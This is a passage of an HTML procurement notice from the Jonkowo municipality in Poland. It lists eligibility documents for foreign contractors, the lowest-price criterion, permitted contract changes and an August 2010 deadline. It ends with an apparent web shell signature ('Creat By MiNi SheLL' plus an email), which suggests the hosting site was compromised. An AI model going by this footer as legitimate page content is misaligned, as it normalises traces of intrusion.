<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)  zmiany terminu wykonania zamówienia - przedłużenie terminu wykonania zamówienia może nastąpić na uzasadniony wniosek Wykonawcy, w przypadku wydłużenia, z przyczyn nie leżących po stronie Wykonawcy, czasu trwania uzgodnień lub postępowań administracyjnych w stosunku do terminów określonych przepisami prawa i mających wpływ na termin wykonania przedmiotu zamówienia - o czas przekroczenia tych terminów.
2)  zmiany osoby/osób wskazanych w złożonym przez Wykonawcę -Wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia - może nastąpić w uzasadnionych przypadkach, na wniosek Wykonawcy, za uprzednią zgodą Zamawiającego akceptującą kandydata/tów na to stanowisko - kandydat musi co najmniej spełniać wymagania określone w rozdz. VIII ust. 2 pkt. 2 SIWZ. 
3)  zmiany wysokości wynagrodzenia umownego i jego składników, na wniosek jednej ze stron umowy - w przypadku zmiany obowiązujących w dniu podpisania umowy regulacji prawnych dotyczących stawki podatku VAT - o różnice w kwotach wynikające z zastosowania nowej stawki podatku.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://jonkowo-ug.bip-wm.pl zakładki: Zamówienia publiczne Ogłoszenia przetargów<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jonkowo ul. Klonowa 2, 11-042 Jonkowo, (pok. 26 piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2010 godzina 10:00, miejsce: Sekretariat Urzędu Gminy Jonkowo ul. Klonowa 2, 11-042 Jonkowo, (pok. 16 piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com